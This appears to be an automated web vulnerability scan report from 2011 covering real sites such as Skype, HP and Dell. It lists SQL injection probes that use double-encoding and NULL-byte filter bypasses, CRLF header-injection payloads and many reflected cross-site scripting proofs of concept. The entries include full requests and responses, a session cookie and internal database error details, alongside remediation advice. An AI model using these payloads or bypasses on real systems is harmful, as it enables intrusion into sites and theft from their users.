There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/user%2527/viewprofilepage/user-id/59914 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:46:35 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 36402
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Page Not Fou ...[SNIP]... <link href="http://community.skype.com/t5/errors/error404page" rel="canonical"> ...[SNIP]...
Request 2
GET /t5/user%2527%2527/viewprofilepage/user-id/59914 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/user%2527/viewprofilepage/user-id/8 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Date: Sun, 04 Sep 2011 21:46:35 GMT Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, private Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 36404
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> Page Not Fou ...[SNIP]... <link href="http://community.skype.com/t5/errors/error404page" rel="canonical"> ...[SNIP]...
Request 2
GET /t5/user%2527%2527/viewprofilepage/user-id/8 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.48. http://community.skype.com/t5/util/componentrenderpage/component-id/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://community.skype.com
Path:
/t5/util/componentrenderpage/component-id/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /t5/util/componentrenderpage/component-id/?1%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title> An Unexpecte ...[SNIP]... <div class="exception-page-message RuntimeException lia-component-content" class="exception-page-message RuntimeException"> ...[SNIP]... <li> Sorry, your request failed. A notification has been sent to the development team for investigation.<p> ...[SNIP]...
Request 2
GET /t5/util/componentrenderpage/component-id/?1%2527%2527=1 HTTP/1.1 Host: community.skype.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.49. http://search2.skype.com/search/search.cgi [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://search2.skype.com
Path:
/search/search.cgi
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /search/search.cgi?query=xss&collection=skype-en&1'=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: search2.skype.com Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Response 1
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 18:17:41 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 39998
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <!-- Meta --> <meta cha ...[SNIP]... <!-- Padre error status: 2 --> ...[SNIP]...
Request 2
GET /search/search.cgi?query=xss&collection=skype-en&1''=1 HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive Host: search2.skype.com Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0
Response 2
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 18:17:43 GMT Server: Apache/2.2.3 (CentOS) Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 40007
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <!-- Meta --> <meta cha ...[SNIP]...
2. HTTP header injection
There are 2 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of the k_clickid request parameter is copied into the Location response header. The payload 27af3%0d%0a1445eb0004d was submitted in the k_clickid parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=27af3%0d%0a1445eb0004d&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinflexion HTTP/1.1 Host: 142.xg4ken.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 16:18:45 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:45 GMT; path=/; domain=.xg4ken.com Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=inflexion&k_clickid=27af3 1445eb0004d P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
2.2. http://142.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://142.xg4ken.com
Path:
/media/redir.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 28e5e%0d%0ae9747ada840 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /media/redir.php?prof=6&camp=4190&affcode=kw93350&cid=7516966884&networkType=search&k_clickid=AMS|_kenshoo_clickid_&url[]=https%3A%2F%2Fh41183.www4.hp.com%2Finflexion%2F%3Fcountry%3DUS%26language%3DUS%26campaigncode%3Dinflexion%26jumpid%3Dinfle/28e5e%0d%0ae9747ada840xion HTTP/1.1 Host: 142.xg4ken.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey#sclient=psy&hl=en&source=hp&q=waf+web+application+security&pbx=1&oq=waf+web+application+security&aq=f&aqi=q-w1&aql=&gs_sm=e&gs_upl=21435l26606l1l26840l27l19l0l6l6l6l1160l12427l5-2.3.8l13l0&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1049&bih=910 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 04 Sep 2011 16:18:46 GMT Server: Apache/2.0.52 (Red Hat) X-Powered-By: PHP/4.3.9 Set-Cookie: kenshoo_id=200d2a28-23e9-a048-8372-00005235d564; expires=Sat, 03-Dec-2011 16:18:46 GMT; path=/; domain=.xg4ken.com Location: https://h41183.www4.hp.com/inflexion/?country=US&language=US&campaigncode=inflexion&jumpid=infle/28e5e e9747ada840xion&k_clickid=AMS|200d2a28-23e9-a048-8372-00005235d564 P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW" Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8
3. Cross-site scripting (reflected)
There are 135 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75be5"><script>alert(1)</script>698f01d1a56 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
3.2. http://afe.specificclick.net/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://afe.specificclick.net
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85163'-alert(1)-'d48efb024f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pasmc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8ced'-alert(1)-'3b0145e93ed was submitted in the pasmc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 508d9'-alert(1)-'a737bccdbe7 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e718"><script>alert(1)</script>08a95dd801e was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the m request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39c75"><script>alert(1)</script>0189dd8aea9 was submitted in the m parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0 ...[SNIP]... y53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D39c75"><script>alert(1)</script>0189dd8aea9http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189880" target="_blank"> ...[SNIP]...
3.7. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://afe.specificclick.net
Path: /serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c03eb"><script>alert(1)</script>7e59f800e4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0 ...[SNIP]... 53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&c03eb"><script>alert(1)</script>7e59f800e4f=1http://clk.atdmt.com/CNT/go/334305255/direct/01/1315189887" target="_blank"> ...[SNIP]...
3.8. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://afe.specificclick.net
Path: /serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3597"><script>alert(1)</script>b03c2c220a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN"><html><head><meta name="robots" content="noindex,nofollow"><title>Advert</title></head><body marginwidth="0" marginheight="0" topmargin="0 ...[SNIP]... 53M3NjaG9vbHMuY29tL2pzL3RyeWl0LmFzcD9maWxlbmFtZT10cnlqc190ZXh0mAKQA8ACBMgClZHuC6gDAegDH-gD3QX1AwAAAEQ%26num%3D1%26sig%3DAOD64_2Uk2nKIPMWkOXJ3LI1O2mvPWJ64A%26client%3Dca-pub-3440800076797949%26adurl%3D&f3597"><script>alert(1)</script>b03c2c220a4=1" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="728" height="90"> ...[SNIP]...
3.9. http://afe.specificclick.net/serve/v=5 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://afe.specificclick.net
Path: /serve/v=5
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8d07'-alert(1)-'6c52c7876e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the &callback request parameter is copied into the HTML document as plain text between tags. The payload 76146<script>alert(1)</script>7493ba11a6a was submitted in the &callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload a61d8<script>alert(1)</script>7791fa49f3c was submitted in the api_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the ac request parameter is copied into the HTML document as plain text between tags. The payload %001ed17<script>alert(1)</script>4582190b2ea was submitted in the ac parameter. This input was echoed as 1ed17<script>alert(1)</script>4582190b2ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: SELECT SQL_CACHE t1.site_application_id FROM site_application t1, application t3 WHERE t1.application_id = t3.application_id AND t1.site_ID = 2522.1ed17<script>alert(1)</script>4582190b2ea AND t1.site_application_isactive = 1 ORDER BY t3.application_order, t1.site_application_id<br> ...[SNIP]...
The value of the st request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3dca'%3balert(1)//c47aa975679 was submitted in the st parameter. This input was echoed as a3dca';alert(1)//c47aa975679 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
Vary: Accept-Encoding
Content-Length: 251
Date: Sun, 04 Sep 2011 16:19:18 GMT
Connection: close
Cache-Control: public, max-age=21600
var DELL = window.DELL || {}; DELL.com = DELL.com || {}; DELL.com.Resources = DELL.com.Resources||{}; var sary=DELL.com.Resources['thundera-ui-jsa3dca';alert(1)//c47aa975679']=[]; for(var i=0;i<sary.length;i++){sary[sary[i].Key]=sary[i].Value}
The value of the ac request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload abad5"%3b1a7a9ffcd44 was submitted in the ac parameter. This input was echoed as abad5";1a7a9ffcd44 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /engine.php?ac=2522abad5"%3b1a7a9ffcd44 HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.cymphonix.com/2011-shaping-demo-sem.html?utm_campaign=2011-Q1-Web-AdWords&utm_source=AdWords&utm_content=7-Minute-Demo&gclid=CPr6tJD_g6sCFQo0QgodKw5i0g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:19:12 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Cache-Control: private
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Vary: Accept-Encoding,User-Agent
Content-Length: 5637
Connection: close
Content-Type: application/x-javascript
var SCS_tid=(SCS_tid)?escape(SCS_tid):"",NS_do=new Array('cymphonix.com'),NS_fe=new Array('exe','pdf','zip','wav','mp3','mov','mpg','avi','wmv','doc','xls','wpd','ppt','swf','mpeg','gif','jpg','tar',' ...[SNIP]... ,NS_ev=0,NS_la="",NS_js="Undetermined",NS_pn=(NS_pn)?escape(NS_pn):"",NS_vpn=(NS_vpn)?escape(NS_vpn):"",NS_uuid=(NS_uuid)?escape(NS_uuid):"",NS_pt=(document.title)?escape(document.title):"",NS_ac="2522abad5";1a7a9ffcd44",NS_c=(NS_c)?NS_c:"yes",NS_rn=Math.round(Math.random()*(99999-1))+1,NS_ru=document.referrer,NS_vp=(typeof (document.location)!="undefined")?document.location:"",NS_dobj=new Date(),NS_sw=(screen.width) ...[SNIP]...
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 24b83<script>alert(1)</script>22cc2cf8cfc was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the profile.catid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2eb52'%3balert(1)//dfc1fb26081 was submitted in the profile.catid parameter. This input was echoed as 2eb52';alert(1)//dfc1fb26081 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the profile.pn request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7cbb'%3balert(1)//6aaa9f386df was submitted in the profile.pn parameter. This input was echoed as e7cbb';alert(1)//6aaa9f386df in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/JavaScript
Content-Length: 8951
Date: Sun, 04 Sep 2011 16:20:37 GMT
Server: Test & Target
var mboxCurrent = mboxFactories.get('default').get('enus_ng',0);mboxCurrent.setOffer(new mboxOfferAjax('<!-- Offer Id: 68329 --><!--\nID 155 - US BSD - browse ANAV layout\nID 406 - US BSD Browse Fran ...[SNIP]...
// Campaign: Temporary Implementation on moving ANAV up // Offer: US BSD Browse ANAV Layout - Recipe A&B // Dev: Anish John
(function(){
var tnt_me = arguments.callee; var sc_pagename = 'e7cbb';alert(1)//6aaa9f386df'; //console.log(sc_pagename); if (sc_pagename!= 'us:en:bsd:04:homepage:'){ if(typeof $j === 'function'){ $j(function(){ //commented out on 5/10/11 by CS to fix Enterprise n ...[SNIP]...
The value of the profile.pt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73ac0'%3balert(1)//12e44e77684 was submitted in the profile.pt parameter. This input was echoed as 73ac0';alert(1)//12e44e77684 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 1d9ac<script>alert(1)</script>ffab928f11c was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the data1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11b8d"style%3d"x%3aexpression(alert(1))"5507b297506 was submitted in the data1 parameter. This input was echoed as 11b8d"style="x:expression(alert(1))"5507b297506 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
3.21. http://h20180.www2.hp.com/apps/Nav [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://h20180.www2.hp.com
Path: /apps/Nav
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc170"%3balert(1)//5094ea54093 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fc170";alert(1)//5094ea54093 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /apps/Nav?h_pagetype=s-005&h_cc=us&h_lang=en&h_page=hpcom&h_product=top&h_client=test&fc170"%3balert(1)//5094ea54093=1 HTTP/1.1
Host: h20180.www2.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> ...[SNIP]... m below accordingly cclang = "en"; // for Customer Care Search REMOVE and USe h_lang and h_cc lang = "en"; // for global hp Search cc = "us"; extravars="fc170";alert(1)//5094ea54093=1&lang=en&cc=us";//for extra parameters that are passed in url if (document.myForm.search[0].checked) top.location="http://www.hp.com/cgi-bin/cposupport/ccsearch/displayans?qry="+n ...[SNIP]...
